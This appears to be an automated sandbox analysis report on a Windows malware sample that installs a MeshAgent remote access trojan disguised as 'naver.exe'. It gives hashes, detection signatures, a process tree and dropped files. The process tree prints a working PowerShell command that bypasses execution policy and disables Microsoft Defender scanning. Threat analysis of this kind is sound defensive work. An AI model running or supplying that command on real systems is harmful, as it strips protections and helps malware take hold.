Analysis

  • max time kernel
    94s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-09-2024 11:28

General

  • Target

    2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe

  • Size

    19.0MB

  • MD5

    e664e32eae75f70aca3b95397beb8706

  • SHA1

    ca649ca8a6f15876d56f7a3491f7435f5b0df8ef

  • SHA256

    d8ae46b6adb3b8dcaddaab2adaf4337048e29c1ffd1caccbe22612dad8113402

  • SHA512

    d522171534431ae1cc9c3536845f3404d89cadbd3e8481ac64c5f3b98b16d0625d6619b00e23e579b575dd99498bd43e6d1b6c07da81839337e9897b901f672a

  • SSDEEP

    393216:ZGbYHohSnaqtvylAjWZ0Xq9YLuxMfCVb2:gbYHPhtvylAjWZ0Xq9YLuxMfCVK

Malware Config

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 64 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:1636
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2244
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4436
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4016
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5072
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:1904
          • C:\Users\Admin\AppData\Local\naver\naver.exe
            C:\Users\Admin\AppData\Local\naver\naver.exe -install
            5⤵
            • Sets service image path in registry
            • Executes dropped EXE
            PID:1768
  • C:\Users\Admin\AppData\Local\naver\naver.exe
    "C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Modifies data under HKEY_USERS
    • Suspicious use of WriteProcessMemory
    PID:1876
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:716
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4224
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4864
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
        PID:4592
      • C:\Windows\System32\wbem\wmic.exe
        wmic SystemEnclosure get ChassisTypes
        2⤵
          PID:4284
        • C:\Windows\System32\wbem\wmic.exe
          wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
          2⤵
            PID:988
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -noprofile -nologo -command -
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            PID:2848

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          2f57fde6b33e89a63cf0dfdd6e60a351

          SHA1

          445bf1b07223a04f8a159581a3d37d630273010f

          SHA256

          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

          SHA512

          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          e89c193840c8fb53fc3de104b1c4b092

          SHA1

          8b41b6a392780e48cc33e673cf4412080c42981e

          SHA256

          920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c

          SHA512

          865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o45equpc.ovp.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\naver\naver.exe

          Filesize

          5.3MB

          MD5

          34ea939943d6809e2a7058a2e45c8add

          SHA1

          63a80e2dc69179e51234ba962b3cc66b8a9a8597

          SHA256

          54db74abc8fd588cf08c0411d052fff4e81b4235d5326c2fd9dbb94152636a84

          SHA512

          e3732baaac1d8840b3a8a9a55b728a859f4aefe86a1ba162acaf4418c14224fd77c8f7ca4a294f6cbeaa5a03724d016760169fec6c735fcc0af95d0d98deb35e

        • C:\Users\Admin\AppData\Local\naver\naver.msh

          Filesize

          22KB

          MD5

          2dd515ea546a81398d94dd15e3b4d55c

          SHA1

          eb0b0fca721a296906166b7e972559b87353b726

          SHA256

          becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2

          SHA512

          439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb

        • memory/2244-30-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/2244-22-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/2244-24-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/2244-1-0x00007FF945253000-0x00007FF945255000-memory.dmp

          Filesize

          8KB

        • memory/4436-26-0x0000018BC1B40000-0x0000018BC1B84000-memory.dmp

          Filesize

          272KB

        • memory/4436-27-0x0000018BC1F90000-0x0000018BC2006000-memory.dmp

          Filesize

          472KB

        • memory/4436-31-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/4436-32-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/4436-33-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/4436-25-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/4436-23-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/4436-54-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/4436-21-0x00007FF945250000-0x00007FF945D11000-memory.dmp

          Filesize

          10.8MB

        • memory/4436-7-0x0000018BC1090000-0x0000018BC10B2000-memory.dmp

          Filesize

          136KB